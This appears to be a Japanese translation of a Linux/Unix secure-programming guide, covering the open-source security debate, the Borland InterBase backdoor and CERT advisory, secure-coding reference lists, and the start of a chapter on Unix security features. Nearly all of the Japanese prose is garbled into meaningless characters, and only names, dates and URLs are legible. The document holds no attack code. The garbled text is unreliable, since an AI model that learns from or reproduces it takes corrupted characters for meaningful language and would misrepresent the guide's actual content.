    [X̃CtTCNĂ΁Aӂ̖_ɑ΂āA
    コȂVXe\zł܂BOɁA3 ̃Iy[eBO
    VXe𐔔NԒƂA12 ɓnăpb`ԂŊ
    m̐Ǝ㐫炵A2 ̏pVXeAc 1 ̃I
    [vVXe̕ZAƂʂɂȂ܂BŌɂȂ
    ܂Asl܂Ă̂̓I[vł͂ȂpVXe̊Jf
    ̕łBVXeƂ͎ԂĈێAT|[gčsƂł
    SɂȂƂƁAԂȂVXe͈Sł͂Ȃv
    ͏オAƂł邩łB_͏oĂɂ͏o
    ܂Ȃ؂ȓ_̋c_͂܂r[ŁA҂ɒ񋟂Z
    LeB𔽉fł؂ɖ]܂Ă܂v
   
ӂė~̂́AƂĐƎ㐫ɂ́Ȃ݂mĂȂ䂦
Ȃꍇ邱ƂłB܂肻̂悤ȃVXéuIɂ͈
SvȂ̂łBケ͐^łA͒N̐Ǝ㐫o
ȂAƎ㐫̏CɍvɈp邩ȂƂ_ɂ
BƎ㐫mĂȂƂĂAۂɂ̐Ǝ㐫ǂɍsĂ
܂킯ł͂܂BA̐Ǝ㐫ê悤ɂp
邩m悤ȂłBƎ㐫NpƂ
AVXeI[v\[Xł낤Ȃ낤{֌W܂B\[
XR[h̖VXéASłƂ咣ȂĂ܂B
UɂƂď񂪏Ȃ߁AƎ㐫ɂAƂ̗̂
RłBɑ΂̂ƂāAU͂قƂǃ\[XR[hKv
Ă炸A\[XR[h𗘗pƎvɂ͋tAZuă\[X
R[hĐĂ܂AƂӌ܂B Flake [2001]ł́AI[
vłȂR[hɑ΂ăZLeB̐Ǝ㐫ǂ̂悤ɒׂĂ邩
_Ă܂(Ƃ΁AtAZug)Bh䑤́A\[X
R[hΖT悤܂Bh䑤̓\[XR[h
ƁAUƔׂĕsȗɂȂ܂B

Ǝ㐫ɑ΂Ă̌x𔭂AƎ㐫ɂċc_肵Ȃǂ
AƂ咣Ȃ鎞܂B̐͗͂Ƃ炵̂
A͍UɂƂoHʂāAƎ㐫ɂĂ̏
𗬂Ă܂ĂƂ_łB܂Â悤ȃAv[`ł͖h
䑤ƎȂ܂܂ŁAU܂}߂܂B܂ŊƂ́A
㐫炳܂ɂȂ̂KɉBʂƂĂ܂Bт
Ă݂ƁÅƂ̓[UɍLmn܂ŐƎ㐫C܂
ł(Ǝ㐫CƎ咣ł̂ɂ킸)B́uSʊJ
vKvł邱Ƃ̘_ɂȂĂ܂B Gartner O[v CNET.com
ł̋LuCommentary: Hype is the real issue - Tech NewsvŗɃR
gĂ܂B

   
    Microsoft  security response center ̃}l[Wł Scott Culp
    ́AɂĒNĂ邱Ƃɑ΂AIÊ悤ɂ
    ܂ׂ̕Ă܂B̔zzɂĂ̓`Iȋc_͉x
    JԂAɂ݂ɂȂĂ܂BƂ΁AIOɋ
    ̓RyjNXƃKI̓Ve悤܂...B Culp 
     Microsoft ̐iōŋߑĂƎ㐫ɂāuZLe
    B̐Ɓv悤ƂĂ܂A͒PɕsȂł
    Bi𐻑Ƃւ̔ᔻ𔽂炻Ƃ鎎݂ےĂƂ
    ܂...B֌W҂ׂĂ{ɓwׂ͂Ƃ́AP̃vZX
    r؂ȂsƂłBL͂ɐƎ㐫m΁A葬₩
    ɏCł܂B 
   
I[v\[X̃vÓAPƂ̊ƂǗĂȂ߁AN
gC̖ؔn∫ӂR[h荞܂邱ƂłAƂ咣
ƂĂȂ܂BmɃgC̖ؔn̓I[v\[X̃R[hɓ
ނƂ͉\łB悤ɏp̃R[hɂ荞܂܂
B]ƈ̒ŁAsĂA肩dG󂯂Ă肵
҂AӂR[h荞܂邩܂B܂gD̑
́AI[v\[XłvÔ悤ɁA𔭌łɂ
BȂɂgDO̐lԂ́AN\[XR[hr[łȂ킯
AГŃR[hr[ĂƂ́Aɉ߂Ȃł
(r[sĂƂĂAr[R[hۂɎgpƂ
ۏ؂́AقƂǂ܂)BI[v\[XŖƂői
AƂlقƂǍȂƂɒӂĂBCZX̂
ƂǂׂẮAׂĕۏ؂Ƃ̂ĂA͕ٔʁA
\tgEFAJЂɐӔC𕉂킹܂B

Borland  InterBase T[ǒ́A̓_ŋ[P[XłB 1992 
 1994 NƂԁABorland ͌̈ӂɁuobNhAvuInterBasev
f[^x[XET[oɂĂ܂B̃obNhÁA[J
A[g[Uf[^x[XEIuWFNg̑삪łAC
ӂ̃vOCXg[łĂ܂AꍇɂẮurootvƂ
̃}V𐧌łĂ܂Ƃ̂łB̐Ǝ㐫͏ȂƂ 6
N̊ԁAiɊ܂܂ꂽ܂܂łBN̐ir[łA
Borland ͂̐Ǝ㐫菜܂łB Borland 
2000 N 7 Ƀ\[XR[hJ܂BuFirebirdvvWFNg
̃\[XR[hƂƂɗオA2000 N 12  InterBase ̂̏d
ȃZLeB̖肪I܂B 2001 N 1  CERT ͂̃obN
hȂ݂ CERT advisory CA-2001-01 <http://www.cert.org/advisories/
CA-2001-01.html> ƂČ\܂BꂽƂɁÃobNhA̓v
O ASCII _v(NbJ[悭g)ƒ߂Ŕ
ł悤Ȃ̂łB̖̓I[v\[X̊J҂R[h
r[邱ƂŔA݂₩Ƀpb`Ă܂BpX[h
mȂ΃vO͈SȂ܂܂ŁA\[XJƃvO
SłȂȂƎ咣邩܂B͖͂Ӗƍl
BASCII _v͕}ŗǂmꂽUi 1 łBU҂ׂĂ
Ǝ㐫ˑRJՓɋ킯ł͂܂񂵁Aۂ̂ƂA
̐Ǝ㐫xɂnĈpȂAƂmȏ؋͂܂
B͂肵Ă邱Ƃ́A\[XJꂽA\[XR[h
r[AƎ㐫ďCꂽAƂƂłB̏
܂Ƃ߂ƁAIWĩR[hɐƎ㐫AI[v\[XɂȂ
₢ȂȒPɂ̐Ǝ㐫AŏIIɂ͏CꂽƂƂł
B 

\[XR[hI[vɂ闘_́AU󂯂\tgEFAȂ
ƂƂł͂ȂAƎ㐫𑖍]@ƂƂłB
Ǝ㐫𑖍]ɂ́Aݒς݂̃VXeňӐ}IɐƎ㐫To
܂Bŋ߂ɂȂ Network Computing evaluation ́Aō̑c[
(Ǝ㐫̒łłȐƎ㐫𔭌)́AI[v\[X̑
c[ł Nessus Ƃ܂[Forristal 2001]B

_͉Ȃ̂ł傤BlIɂ́AvOƂ̂܂I
[v\[XƂčƁAŏ̓[UɂƂĈSႭĂ(Ǝ
ɂȂĂ)Aoɂ(Nx)AI[vłȂv
OɈSɂȂ\ƍlĂ܂BvO
I[v\[Xɂ邾ł́Aɂ͈SɂȂ܂񂵁AI[v
\[XȃvOɂ邱ƂŁASɂȂۏ؂܂B

 E ܂ۂɃR[hr[Ȃ΂܂B͋c_ɂ
    dvȓ_ 1 łBIɃI[v\[XȃvWFNgł΁A
    R[h̓r[̂ł傤Br[󂯂񐔂Ȃ
    v͂낢Ƃ܂Bjb`łقƂǗpȂi(r
    [Ȃ݂҂łȂ)J҂قƂǂȂꍇA܂ɂg
    ȂRs[^ꂪɂ܂BJ҂lŋ͎҂
    ȂvÓAԈႢȂ̎̃r[󂯂܂B
    ̈ŃvO̒ɂ́ASƂȂ҂݂A傭
    R[h𒲂ׂA̐lԂsr[(ȂƂvɂ͂Ȃ
    Ă)Ă肷郁o[ւĂꍇ܂B
    ʓIɃr[A񂢂΂قǁAN_o
    \荂Ȃ܂B́ův_̊{łB 
   
    I[v\[Xł邱Ǝ̂Ar[󂯂錩݂𒘂
    v 1 ɂȂ킯ł͂܂Bx_[̒ɂ́uJ
    \[X(disclosed source)v(u\[X݂v (source
    available)Ƃ)vOI[v\[Xƃ|[YƂƂ
    ܂B̃vȌL҂͂炸L͈͂ɓƐ
    IȌLĂ̂ŁAuŁvL҂̂߂ɓƂӗ~
    l͂قƂǂȂł傤BςŕϑIȌ`ԂƂ
    (MPL ̂悤)I[v\[X̃CZXłAĂ܂
    Bǂ́A̐ʂɑ΂ĕʂ̒NĂ̂ł΁A
    {eBAŎQ\͒ႭȂƂƂł(Bruce Perens
    ͂̓_ɂāAu̒NDłŌق̐gɂȂ
    HvƌĂ܂)BCȃr[ÁAvOC
    ܂B̂C킮悤ȃCZXł́Áu
    vƂɂȂ܂B Elias Levy ̓I[v\[X̃ZLe
    BɊւނ̘_̒ł̓_ŊԈႢƂĂ܂Bނ͂
    \tgEFA(Ⴆ TIS  Gauntlet)͓I[v\[Xł͂Ȃ
    ̂łB
   
 E ɁAR[hAȂƂr[肷l̒ɁA
    SȃvȌ𗝉ĂKv܂Bł΁A
    ɗĂ΂ƊĂ܂BůvĂA
    mȂ΁AɂȂ܂BĂl
    ́A݂Ȃ݂ȈSȃvȌmȂĂ
    ȂAƂ_ɋCĂB 
   
 E OɁAx肪ȂA݂₩ɏCĂzz
    ΂܂BI[v\[X̃VXeł́A₩ɖ肪C
    Xɂ܂AX[YɔzzƂ͌܂BƂ
    ΁AOpenBSD ̊J҂̓ZLeBׂ̌r[̂ɒ
    Ă܂BAmF_IWi̊J҂ɂtB
    [hobNƂ͌܂B܂肠VXêo[W
    Ĉɂ͓sǂ̂łÃVXe͒Ȃ܂܂ɂ
    Ă܂܂B
   
I[v\[X̂ 1 ̒́A݂ȂAȂ
ɏCłƂƂłB

܂AI[v\[XE\tgEFÃZLeBւ̉ex́AZ
LeBEł܂L͈͂ɓnċc_ĂŒłBAȐ
Ƃ̑͂SɂȂ\łƍlĂ܂B

 

2.5. SȃvO̎

SɂKvvÓAɓn܂(pɂẮA̕
Œ`܂)BʓIȎނLɂ܂B

 E ꂽɂf[^{ꍇɗpAvP[VEv
    OBr[A[ƂėpvO([hEvZbTt@
    CEtH[}bg邽߂̃r[A[)ł́AMłȂ[U
    Aꂽꏊ{f[^𑗂悤ɋ߂邱Ƃ悭܂
    (̃NGXg Web uEUIɎs\܂)B
    ͂肵Ă邱Ƃ́AMłȂ[U̓͂ɂāAAvP
    [VCӂ̃vOsĂ܂Ă͂ȂAƂ
    łB}N (f[^\鎞Ɏs)T|[ĝ
    ͂łBT|[g𓾂ȂȂAKŜ߂̃Th{b
    NX쐬Ă(Th{bNXƂ͕GԈႢN
    ₷̂ŁA܂Ƃ͌܂BāA͂Ȃ}N
    T|[gׂł͂Ȃ̂ł)B Chapter 5 ŋc_obt@
    I[o[t[̂悤ȖɂĂAӂKvłB̖́A
    MłȂ[Ur[A[gāACӂ̃vOI
    悤ɂĂ܂܂By󒐁FTh{bNX(sandbox)Ƃ́A
    tŕی삳ꂽ̈B̗̈œAvP[V́A
    VXeɃ_[W^Ȃ悤ɐ݌vA삵܂z
   
 E VXeǗ(root)gpAvP[VEvOB̂
    ȃvÓAVXeǗ҈ȊOłĂ܂f[^M
    ׂł͂܂B
   
 E [JŃT[rXsT[o(f[ƂĂт܂)B
   
 E lbg[NoRŃANZXT[o(lbg[NEf[Ƃ
    ܂)B 
   
 E Web x[X̃AvP[V(CGI XNvg̈ꕔ)B̃A
    vP[V́Albg[NoRŃANZXT[oƂĂ͓
    ȃP[XłBA܂ɂyĂ̂ŁAꂾňꕪ
    鉿l܂B̕ɑvÓAWeb T[oo
    RĊԐړIɎsAtB^Uɂ͂܂Ah
    ׂłȂA͂Ȃ܂܂ɂȂĂ܂B
   
 E Avbg(Ȃ킿ANCAgɃ_E[hAIɎs
    )B Java Ƃ킯LłǍ(Ƃ Python)
    lɃoCER[hT|[gĂ܂BɃZLeBdv
    ȓ_܂B́ANCAgŃAvbg̎s@
    \lAuSȁvIy[VmɎs
    ɂĂ邩AƂ_ƃAvbg쐬҂Aӂ̂zXg̖
    (܂NCAg͕ʐMłȂ)ɑΏȂ΂Ȃ_
    łBӂ̂zXgŁAAvbgȂ
    ܂AāẢ@͋^łBaVȃe[}Ȃ
    ŁAł͂ȏG܂By󒐁FoCER[h́ANC
    AgvO(Ƃ Web uEU) ̃VXe(Ƃ
    Web T[o)_E[hAIɎsvOSʂ
    w܂z
   
 E setuid  setgid vOB̃vÓA[Jɂ
    郆[Us܂Bs₢Ȃ₻̃vÕI[i[
    ̓I[i[̃O[v(̗͂)̌^܂B
    낢ȈӖŁA͍łSɂɂvOłB͓
    ͂̑啔MłȂ[U䂵ĂāA͎̓̂^
    邩łB 
   
 

́̕A܂܂Ȏނ̃vỎۑЂƂ܂Ƃ߂ɂĈĂ
܂B̂ɂ͌_܂B́Aň_ɂ́Av
OSނ֓KpłȂ̂_łB setuid  setgid 
vÓAvȂ܂܂ȓ͂AKChCɂ setuid
 setgid vOɓĂ͂܂̂܂BAۂ
Ȃɋʂ͂肵Ă킯ł͂ȂAvOł͂̔e
ẑ܂(Ƃ CGI XNvg setuid  setgid 
A悤ȉe@Őݒ肵Ă肵܂)B܂s`
ɂĂāÂꂼꂪقȂuށṽvOɂȂ
Ăꍇ܂B܂܂Ȏނ̃vOЂƂ܂Ƃ߂ɂČ
闘_́AJeSɃvO𖳗ɓĂ͂߂邱ƂȂA
IɌł_ɂ܂BČĂƂŁAS߂
vOׂĂɑ΂āAĂ͂܂P[XƂ킩
B

́̕AC ŏvOɑ΂Ă܂BC++  PerlAPHPA
PythonA Ada95AJava ̂悤ȑ̌ɂĂA͈Ă܂B
 Unix CNȃVXeł C SȃvO錾Ƃ
łyĂ邽߂ł(CGI ͗OŁAPerl  PHPAPython 悭g
)B܂ C ȊǑ̑啔́A C ̃CuĂяo悤ɍ
Ă܂B C SȃvOƂړIɁuŗǂ́v
łAƂƂɂ͂Ȃ܂Bŏqׂ錴̑啔́A
gpĂ錾̂ɂ炸Ă͂܂܂B 

 

2.6. ^[A肪Ƃɉl

SȃvÔɓĈԂȓ_́A쐬҂vlH
؂ւȂ΂ȂȂƂɂ܂B܂A^[A
Kv邱ƂłBG[(ׂƂoOƂĂ܂)
NVXeւ̉eAʂ̃vOƂ͂܂ႤłB

SKvƂĂȂʂ̃vOɂ́AG[񂠂܂
BG[͊}ׂ̂ł͂܂񂪁AxX͋NȂ̂
ŁA肻ł܂B[UG[ɑĂ܂ĂA
̃oOƂȂAp悤Ƃł傤B

SKvȃvOł͂̏󋵂ς܂BƂ郆[ÚAӐ}I
ɃoO{oAقƂǋN肻Ȃ󋵂N܂B
Â悤ȍUŕsȌ𓾂悤Ƃ܂BƂŁASȃvO
ꍇɂ́A^[AƂɉlł̂ł
B

 

2.7. ̃hLg ?

uǂẴhLĝHvƎ󂯂̂łA
͉L̒ʂłBNALinux  Unix ̃fxbp[͓
ȃZLeB̗ɉx͂܂肱ł悤Ɏv܂Bč
鑤́AƂ炦̂Ƃ͌܂BoOŏR
[hɓĂȂȂAƗǂ͂łBm̗ɂ͂
Ȃ@ɂāA΁AƂʂ̏ȂƂɖ
[ƍlĂ܂B͌JĂ̂łȀ{
ôAÂȂĂAs\Aʂ̖܂
ł肵܂B܂̂悤ȏ̑啔ɂ Linux LpĂ
ɂ炸A Linux ɏœ_𓖂Ăc_܂܂B̂
ȔwiA\tgEFÅJ҂ߋ̉߂JԂAVXe
SƂȂ邱ƂāÃhLg܂B̓_
Ăɒm肽΁Ahttp://www.linuxsecurity.com/feature_stories/
feature_story-6.html QƂĂB 

Ɗ֘AɁũhLgQƂ̂ɗ߂ɁAǂ
gŃhLĝHvƂ̂܂B͂
܂B

 E ̑́AɎU݂Ă܂Bdvȏ̌nIȃhL
    gɂ܂Ƃ߂΁Ap₷Ȃ܂B
   
 E ̒ɂ̓vO}ł͂ȂAVXeǗ҂⃆[Ȕ
    ܂B
   
 E \ȏ́AVXeԂŋʂȗvf(Unix CNȃVXe
    Ăœ삷)ɏd_ĂꍇALinux ɂĂ͂܂
    _Ă܂BڐA̓_炷΁ALinux ŗL̋@\ɐG
    ̂̂mɌłB Linux ɌŗL̋@\g΁AZ
    LeBmɌシꍇ܂B Linux ȊOւ̈ڐAv
    ĂALinux ĂΌŗL̋@\gȂ邩
    B Linux 𒆐SƂāALinux ΏۂƂĂlXɖɗ
    ւ̎QƂ邱Ƃ܂B̏񂪑ɂ͕K
    Ƃ͂ȂƂĂłB
   
 

 

2.8. ݌vƎ̎wjɂĂ̏

SȃvO@(邢́ÃvÕZLeB
_ǂ̂悤ɔ̂)ɂāA𗧂hLg
܂B܂̃hLǵÃhLgŃKChCƂ
Ăꂩ疾mɂĂڂ̍ɂȂĂ܂B 

ėpIȃT[o setuid  setgid vOɂẮA
hLg񂠂܂(hLg̒ɂ͒ڌ̂
Ȃ̂܂)B

Matt Bishop[1996, 1997] ́ÃgsbNɊւĂւf炵hL
g쐬A\s肵Ă܂B̏ނ Web TCg 
http://olympus.cs.ucdavis.edu/~bishop/secprog.html ł̃gsbN
ɈĂ܂B AUSCERT ̓vO~OɂẴ`FbNXg 
[AUSCERT 1996] <ftp://ftp.auscert.org.au/pub/auscert/papers/
secure_programming_checklist> JĂ܂B GarfinkelA
Spafford ̒ [Garfinkel 1996] <http://www.oreilly.com/catalog/
puis>  23 ͂Ř_ĂAS suid lbg[N֘ÃvO
@~ɂĂ܂B Galvin [1998a] <http://www.sunworld.com/
swol-04-1998/swol-04-security.html> ́ASȃvOJH
`FbNXgɂĕ₷Ă܂Bŋ߂ɂȂă`Fb
NXgXVA Galvin [1998b] <http://www.sunworld.com/
sunworldonline/swol-08-1998/swol-08-security.html> Ō܂B 
Sitaker [1999] <http://www.pobox.com/~kragen/security-holes.html> ɂ
AuLinux ZLeBčv`[ĂɂāÄꗗ
܂B Shostack [1999] <http://www.homeport.org/~adam/
review.html> ł̓ZLeBɋCzKvR[hr[
ɖ𗧂`FbNXg`Ă܂B NCSA [NCSA] <http://
www.ncsa.uiuc.edu/General/Grid/ACES/security/programming> ł́AS
vÔ߂̊ȌɗKChC񋟂Ă܂B̑
ŏ񌹂ƂĖɗ̂́A Secure Unix Programming FAQ [Al-Herbish
1999] <http://www.whitefang.com/sup/>  Security-Audit's Frequently
Asked Questions [Graham 1999] <http://lsap.org/faq.txt>A Ranum [1998]
<http://www.clark.net/pub/mjr/pubs/pdf/> ܂BAhoCX̒ɂ
ӂȂ΂ȂȂ̂܂BႦ BSD  man  setuid(7) 
 [Unknown] <http://www.homeport.org/~adam/setuid.7.html>A access(3)
̎gp𐄏Ă܂A̎gpɂƂȂĐ鋣Ԃ̊댯
lĂ܂B Wood[1985]ɂ́Aɗ̂́AÂȂĂ܂A
hoCXuSecurity for Programmersv̏͂ɂ܂B Bellovin [1994]
<http://www.research.att.com/~smb/talks> ɂ͖ɗKChC
ftpd ̎VvňSɑgݒƂ̗̋Ⴊ
܂B FreeBSD  FreeBSD [1999] <http://www.freebsd.org/security
/security.html> ƂKChCpӂĂ܂B [Quintero 1999]
<http://developer.gnome.org/doc/guides/programming-guidelines/
book1.html> ́A GNOME ̃vO~OEKChCƊ֘A
܂AZNV 1 ŃZLeBɂČĂ܂B 
[Venema 1996] <http://www.fish.com/security/murphy.html> ́ASȃv
Ogގɂ肪ȃG[(肫Ȃ̂Ő\ȃpX[h
ӂf[^ɂ鉘A[UANZXłf[^Ɋ܂܂Ă܂
Ă@ÃvOւ̈ˑ)ɂďڂ ()_
Ă܂B [Sibert 1996] <http://www.fish.com/security/maldata.html> 
Aӂf[^NЂɂĐĂ܂B

Web ̃C^tF[Xł Common Gateway Interface(CGI)́AvO}
hLgƂāAZLeB̃KChCpӂĂ
܂B Van Biesbrouck [1996] <http://www.csclub.uwaterloo.ca/u/
mlvanbie/cgisec>, Gundavaram [unknown] <http://language.perl.com/CPAN/
doc/FAQs/cgi/perl-cgi-faq.html>, [Garfinkle 1997] <http://webreview.com
/wr/pub/97/08/08/bookshelf> Kim [1996] <http://www.eekim.com/pubs/
cgibook>, Phillips [1995] <http://www.go2net.com/people/paulp/
cgi-security/safe-cgi.txt>, Stein [1999] <http://www.w3.org/Security/
Faq/www-security-faq.html>, [Peteanu 2000] <http://members.home.net/
razvan.peteanu>, and [Advosys 2000] <http://advosys.ca/tips/
web-security.html>.

̌ɂĐGꂽhLg͂񂠂܂B̃hL
gł́AɌŗLȓ_ɐGꂽZNVłɘ_܂BƂ
APerl ̔zz̒ɂ́A perlsec(1) <http://www.perl.com/pub/doc/
manual/html/pod/perlsec.html> ƂZNVAPerl S
g@ɂĘ_Ă܂B http://www.cs.princeton.edu/sip ɂ
Secure Internet Programming ƂTCǵARs[^̃ZLeB
SʂɂĈĂ܂AJava  ActiveXAJavaScript ƂoC
ER[h̎dg݂ɏœ_𓖂ĂĂ܂B Ed Felten (̃TCg̒S
l 1 l) Java Sɂ鏑ЂĂ܂B ([McGraw 1999]
<http://www.securingjava.com>)B̓_ɂĂ Section 9.6 ň܂
B Sun oĂR[hSɂ邽߂̃KChCɂ́A Java
 C ɂĐGꂽ̂܂B http://java.sun.com/
security/seccodeguide.html ŗpł܂B

Yoder[1998]ɂ́AAvP[ṼZLeBɎgލۂɗpł
p^낢날܂BKChCƂĂ͋̐Ɍ܂A
悭gvO~OEp^ƂĖɗƎv܂B Schmoo O[
v́ASȃR[h@ɂĂ̏񃊃N Web TCgɍڂ
Ă܂Bhttp://www.shmoo.com/securecodeB

ʂ̑ʂ_ĂhLgA񑶍݂܂(Ƃ
uVXeNbNɂ́v)BƂ McClure[1999]܂
AC^[lbgƂEŌ΁AɔȎ낪Ă
B܂ARs[^EA[LeN`Uɂ͂ǂ̂悤ɊJ
΂悢ɂĂAL͈͂ȃhLg(Ƃ [LSD 2001]
̂悤) ݂Ă܂B Honeynet vWFNǵAۂɂǂ̂悤
UsĂ̂ɂāA (v܂)W߂Ă܂B http://
project.honeynet.org Ώڍׂȏ񂪓܂B

̃vOɂāAƎ㐫ɊmFĂʂɏo
Ă܂B̏́AuȂ悤ɂvƂ_ł͖ɗ܂
BA̋̓IȗႩAʓIɗpłKChC
ô͂ȂςłBZLeBɂċc_郁[OX
g܂BłLȂ̂ 1  Bugtraq <http://SecurityFocus.com
/forums/bugtraq/faq.html> ܂B̃[OXg͐Ǝ㐫̈
쐬邱ƂɔMSɎgł܂B CERT Coordination Center
(CERT/CC)́A\Iȋ@ւ 1 ŁAC^[lbg֘ÃZLeB
̖񍐂Ă܂B CERT/CC ͂傭傭𔭍sA[ȃZL
eB̖₻̉exApb`Pǂē
悢̂Ă܂Bڂ́A http://www.cert.org 
Bӂė~̂́AƂ CERT ͏^Rs[^
}Ή`[łāAɁuCERTvZLeBɂĂ̑\@ւ
ȂĂ킯ł͂Ȃ_łBčGlM[Ȃ̋@ւł Computer
Incident Advisory Capability (CIAC) <http://ciac.llnl.gov/ciac> Ǝ
ɂĕ񍐂Ă܂Bꂼ̃O[v͓悤ȐƎ㐫
Ă܂A΂΂ȌĂѕĂ܂B̖邽߂
AMITRE ́Au炩ȐƎコƋN\Ǝコ̋ʉv
(Common Vulnerabilities and Exposures(CVE))̈ꗗ쐬Ă܂B
ꗗł́AʂňӂɌ܂鎯ʎq(name)āAʓIɍLm
Ǝ㐫ƒNZLeB̖ڂĂ܂B http://
www.cve.mitre.org ĂB NIST  ICAT ̓Rs[^̐Ǝ㐫
\Ȍ`ł܂Ƃ߂̂łBCVE ̐Ǝ㐫̃JeSɂƂÂĂ
̂ŁAŌr\ɂȂĂ܂B http://csrc.nist.gov/icat
ĂBy󒐁FMITRE  CVE ̏ڍׂ́A about MITRE <http://
www.mitre.org/about>  about CVE <http://cve.mitre.org/about/> Q
Ăz

̃hLǵAłLvdvƍlKChC܂Ƃ
̂łBDGȃvO}ǂ񂾂ŁAȂɈSȃv
Oł悤An邱ƂڕWɂĂ܂B̖ڕW
PƂŃJo[łhLgɂ͂ڂɂƂ͂܂񂪁A
̎g݂͈Ӌ`ƐMĂ܂Bj̓oX邱ƂłBu
l邾̃KChCXgAbvv(GhXȍƂł
܂łĂ`ɂȂȂ)ƁAuȌȁvXg낢날ăIC
ŗpł΁ALvȌɂ͂Ȃ̂́AdȖ肪ȗĂ
܂ƂA̗҂̃oX؂łB͂肵Ȃꍇ́A
LڂĂ܂Bꍇ́ANuꂳ΂ׂ OK
vIȃhLgǂŁȀpł悤ɂȂĂA
ʓIƍl邩łB̃hLg̍\(ꗗׂ͂āAƎ
ł܂܂ȍ\ɂȂĂ܂)́Ag쐬AKChC(ɃP
CpreB fsuid ̂悤 Linux Ǝ̂)̒ɂAg
̂܂BLɂ֘AhLgׂēǂނƂE
߂܂BA͌Ił͂ȂłˁB 

 

2.9. ̑̃ZLeB

ZLeBɓ Web TCg⃁[OXg͖cȐ
Ă܂Bł́Ȃ̃ZLeBĂ܂
B

 E Securityfocus.com <http://www.securityfocus.com> ́AʓIȃZL
    eB֘Ãj[XLxɒ񋟂ĂAZLeB֘A
    [OXgÂĂ܂BQ@A[JCǔ
    ɂẮAWeb TCgĂB SecurityFocus ōł֘A[
    [OXgɂ́AL̂悤Ȃ̂܂B
   
      LŐGꂽ悤ɁAuBugtraqv[OXǵuRs[^
        ̃ZLeB̐Ǝ㐫ɂẴ[OXgŁAf[
        ^[݂Ă܂BƎ㐫łAꂪǂ̂悤ɍU
        AǂhƂł邩AƂƂɂāAڍ
        ȕ񍐂Ƌc_ׂČJĂ܂vB
       
      usecprogv[OXǵAf[^[郁[OX
        gŁASȃ\tgEFAJ@_ƃeNjbNc_
        ܂B͂̃[OXgƂĂڂĂ܂Bf
        [^[ƘAgāA secprog ŏo_(_ɔ[
        ꍇ)ÃhLgɔfĂ܂B
       
      vuln-dev [OXǵAݓIɃZLeBz[ƂȂ邪
        A܂󂯂ĂȂ̂c_Ă܂B
       
 E IBM ́udeveloperWorks: Securityv͋[LW߂Ă܂B 
    http://www.ibm.com/developer/security łɊwKĂBy
    󒐁F{TCg <http://www-6.ibm.com/jp/developerworks/>
    ܂z
   
 E Linux ŗL̃ZLeBm肽ȂA LinuxSecurity.com
    <http://www.linuxsecurity.com> 悢ł傤B Linux ̃R[h
    邱ƂɋȂA Linux Security-Audit Project FAQ
    <http://www.linuxhelp.org/lsap.shtml>  Linux Kernel Auditing
    Project <http://www.lkap.org> Ă݂Ƃ悢ł傤B́A
    Linux ̃R[hɂẴZLeB̖ɔMSɎgł
    B
   
̃VXeSɂ悤ƂĂȂÃVXẽZLeB
֘Ã[OXgɂQĂ(Ƃ Microsoft
 Red Hat )B΁AZLeB̃Abvf[g𓾂܂
B

 

2.10. hLgł̖񑩎

VXe man y[ẄṕA(ԍ)Ƃ`ɂ܂Bԍ
A man ̃ZNVԍłBuǂQƂĂȂv|C^l NULL
Ƃ܂BC RpĆA|C^KvȂ̊ŁA 0 
NULL ɕϊĂ܂BAC ̋KiƂĂ NULL ۂɂׂĂ 0
rbgŖ߂Ƃ߂Ă͂܂B C  C++ ͕u\0
(ASCII  0)vʈĂ܂B̒l̃hLgł NIL 
܂(NIL ͒ʏuNULvƂ܂AuNULvƁuNULLv̔)
B֐⃁\bh̖ÓAɂĂ͏ł͂߂Kv
ĂAɑ啶E̎g͌̂܂܂ɂĂ܂BuUnix C
NȁvƂpgɂ́AUnix  LinuxA Unix ƔɎʂ
{\̑̃VXew܂B POSIX Ƃt͎g܂
BƂ̂́AWindows 2000 ̂悤 POSIX 𕔕IɎ͂ĂĂ
A܂ZLeBf܂قȂĂ̂邩łB

U҂̂ƂuA^bJ[vƂuNbJ[vƂuAho[T(G
)vƌ܂BW[iXǵuUҁv̂ɁunbJ[vƂ
tgꍇ܂B̃hLgł͂(Ԉ)\
Ă܂BƂ̂A Linux  Unix ̊J҂́AĝƂunbJ[
vƂĂꍇłB̌t͈ӖŎgĂ͂܂
łB܂ALinux  Unix ̊J҂ɂƂāunbJ[vƂt
AłƂłARs[^ɂƂ킯MvĂlԂ
ӖĂ̂łB

 

Chapter 3. Linux  Unix ̃ZLeB@\

                                    TdȂۂApm 
                                                                 
                                                                       
                                                񐹏⼌ 2  11 

Linux  Unix ̃ZLeB@\̃KChCɂĘ_OɁAv
O}̗ꂩA̋@\ł邩mĂĂ悢Ǝv܂B
̃ZNVł́AUnix CNȃVXêقƂǂōLgĂ邱
̋@\Ɛ܂B Unix CNȃVXeԂɂ͂Ȃ
΂AVXeׂĂŏqׂ@\Ă킯ł͂
ƂɒӂĂB̏͂ł́Ag@\̂ Linux ɌŗL
̋@\ɂĂڂčs܂BLinux ̃fBXgr[VԂ̈
́AZLeBɊւvO~OƂ_猩ƁAقƂǖ
ƂĂ悢Ǝv܂B́A{Iɂ͓J[l C Cu
(GPL x[X̃CZX́AZpvV𑬂₩ɕy܂)B܂A
ꂼ Unix ̎Ԃɂ̓ZLeB֘Ał̈Ⴂ܂
AŐ邱ƂׂĂJo[Ă킯ł͂܂B̏
ł́AƂ΋ANZX(mandatory access control (MAC)) ̎
悤ɁA܂ Unix CNȃVXȇĂȂ̂ɂĂ
c_܂Bꂩ@\ł邩ɒmĂȂA
ZNV΂Ă\łB

vO~OKCh́ALinux  Unix ł̃ZLeB֘Äꕔy
Ȃ邾ŁAdvȏ͔΂Ă܂P[X܂BƂ
uǂ̂悤ɎgvƂƂ͑܂ɂ͘_܂Ap̍ۂɊւ
oĂZLeB̑ɂĂ͌떂Ă܂BƂ͋tɁA
man ɂ͌X̊֐ɂāAڍׂȏ񂪑ʂɂ܂B man ͌
X̊֐ǂ̂悤ɗp̂AƂׂłāAZLe
B̖BĂ܂Ăꍇ܂B̃ZNVł́ÃM
bv𖄂߂悤ɐS܂BLinux ŃvO}悭pȃZ
LeB̎dg݂ɂĊTv܂AɃZLeBɂ
ɏœ_𓖂Ă܂B̃ZNV́Aʂ̃vO~
OEKChɓ˂񂾓eɂȂĂāAZLeB֘A̎
ɏœ_iAɏڂ񂪓悤ɎQlĂ
B

܂{IȂƂ납B Linux  Unix  2 ̕\Ă
B̓J[lƁu[UԁvłBvÔقƂǂ́A[U
(J[l)œ삵Ă܂B Linux ́uJ[lEW[v
TOT|[gĂāAIȒPɃR[hJ[lɒǉł
悤ɂȂĂ܂BˑRƂăJ[l͊{Iȕɕ
Ă܂B̃VXe̒ɂ(Ƃ HURD ̂悤)Au}CNJ[
